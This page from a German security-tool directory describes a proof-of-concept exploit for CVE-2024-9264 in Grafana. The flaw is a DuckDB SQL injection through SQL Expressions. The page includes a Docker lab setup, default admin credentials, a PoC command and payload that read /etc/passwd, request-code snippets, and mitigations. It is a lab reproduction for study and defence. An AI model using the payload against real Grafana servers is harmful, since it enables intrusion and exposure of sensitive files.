Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-9264 — PoC-Exploit für CVE-2024-9264: Sicherheitslücke in Grafana SQL Expression, die lokale Dateieinbindung und Remote-Codeausführung durch DuckDB-SQL-Injection ermöglicht. Enthält Docker-Lab-Setup und Python-Exploit-Skript. | Kitploit
Tools/GitHubGitHub/yeonchoda/cve-2024-9264
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubyeonchoda/cve-2024-9264

CVE-2024-9264

PoC-Exploit für CVE-2024-9264: Sicherheitslücke in Grafana SQL Expression, die lokale Dateieinbindung und Remote-Codeausführung durch DuckDB-SQL-Injection ermöglicht. Enthält Docker-Lab-Setup und Python-Exploit-Skript.

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-9264

Referenzen https://github.com/vulhub/vulhub/tree/master/grafana/CVE-2024-9264

1. Zusammenfassung der Schwachstelle

ElementInhalt
CVECVE-2024-9264
ZielGrafana (SQL Expressions)
AuswirkungLocal File Inclusion (LFI), Remote Code Execution (RCE)
SchweregradCritical (CVSS 9.9)
AngriffsbedingungenAuthentifizierter Benutzer (Admin-Rechte)
AngriffsmethodeAusnutzung der SQL Expression-Funktion zur Ausführung von DuckDB SQL

Grafana ist ein Open-Source-Überwachungstool, das verschiedene Daten wie Server, Anwendungen und Datenbanken in leicht verständlichen Grafiken oder Dashboards visualisiert.

CVE-2024-9264 ist eine Schwachstelle in der SQL Expressions-Funktion von Grafana.

Da Grafana das intern verwendete DuckDB SQL nicht ordnungsgemäß validiert, kann ein Angreifer über SQL Expressions beliebiges DuckDB SQL ausführen.

Damit kann man:

  • Lokale Dateien auf dem Server lesen (LFI)
  • Systembefehle ausführen (RCE)
  • Sensible Informationen preisgeben

In dieser Übung wurde Grafana 11.0.0 in einer Docker-Umgebung ausgeführt und die Schwachstelle mittels PoC durch Auslesen der Datei /etc/passwd reproduziert.


2. Umgebungskonfiguration

Übungsumgebung

KomponenteInhalt
OSUbuntu
DockerDocker Compose
Grafana11.0.0

Repository herunterladen

root@kitploit:~
git clone https://github.com/yeonchoda/CVE-2024-9264
cd CVE-2024-9264

Docker ausführen

root@kitploit:~
docker-compose up

Grafana-Ausführung überprüfen

root@kitploit:~
http://localhost:3000

Grafana läuft

Die Standard-Anmeldeinformationen von Grafana lauten wie folgt.

root@kitploit:~
ID : admin
PW : admin

3. Schwachstellenbedingungen

Damit die Schwachstelle ausgenutzt werden kann, müssen folgende Bedingungen erfüllt sein:

  • Verwendung einer anfälligen Grafana-Version
  • Die SQL Expressions-Funktion muss verfügbar sein
  • Der Angreifer muss sich bei Grafana anmelden können
  • DuckDB SQL Expression muss aktiviert sein

In dieser Übung wurde das Standard-Administratorkonto (admin/admin) verwendet.


4. Reproduktion

PoC ausführen

Um eine lokale Datei zu lesen, wurde der folgende Befehl ausgeführt.

root@kitploit:~
python3 PoC.py -u http://localhost:3000 -f "/etc/passwd"

Der PoC erstellt den folgenden SQL Expression.

root@kitploit:~
SELECT * FROM read_csv_auto('/etc/passwd')

Dieser wird über die /api/ds/query-API an Grafana gesendet.


Ergebnisüberprüfung

Grafana führte das SQL direkt aus und gab den Inhalt von /etc/passwd als Antwort zurück.

Ausführung von PoC.py

Neben /etc/passwd können auch andere Dateien eingesehen werden. Ausgabe von /etc/group

Damit wurde bestätigt, dass Local File Inclusion erfolgreich durchgeführt wurde.


5. PoC-Code

Der PoC ist in Python geschrieben und führt die folgenden Schritte aus:

  1. Aufruf der Grafana-API (/api/ds/query)
  2. Erstellung des SQL Expressions
  3. Senden der Anfrage als JSON
  4. Parsen der Antwort (JSON)
  5. Ausgabe des Dateiinhalts

Das beim Lesen einer Datei generierte SQL lautet wie folgt.

root@kitploit:~
sql_query = f"SELECT * FROM read_csv_auto('{args.file}')"

Die API-Anfrage wird wie folgt durchgeführt.

root@kitploit:~
response = requests.post(
    api_url,
    auth=(username, password),
    headers=headers,
    data=json.dumps(payload),
    verify=False
)

Dies kann auch mit dem curl-Befehl überprüft werden. curl

6. Gegenmaßnahmen

1. Aktualisierung auf die neueste Grafana-Version

Die effektivste Gegenmaßnahme ist die Aktualisierung auf die neueste Version, in der die Schwachstelle behoben wurde.


2. Einschränkung der SQL Expressions-Funktion

Unnötige SQL Expression-Funktionen sollten deaktiviert oder durch Anwendung des Prinzips der geringsten Rechte eingeschränkt werden.


3. Schutz des Administratorkontos

  • Ändern des Standardkontos (admin/admin)
  • Verwendung eines starken Passworts
  • Minimierung der Administratorkonten

Fazit

Nach der Einrichtung von Grafana 11.0.0 in einer Docker-Umgebung wurde die Schwachstelle CVE-2024-9264 reproduziert.

Mit einem in Python geschriebenen PoC wurde die SQL Expression-Funktion ausgenutzt und erfolgreich die Datei /etc/passwd gelesen. Dadurch wurde bestätigt, dass bei unzureichender Eingabevalidierung von SQL Expressions sensible Dateien offengelegt werden können und je nach Umgebung auch eine Remote Code Execution möglich ist. Solche Schwachstellen können durch Sicherheitsmaßnahmen wie Aktualisierung auf die neueste Version, Einschränkung der SQL Expression-Funktion und Schutz des Administratorkontos verhindert werden.

Tool herunterladen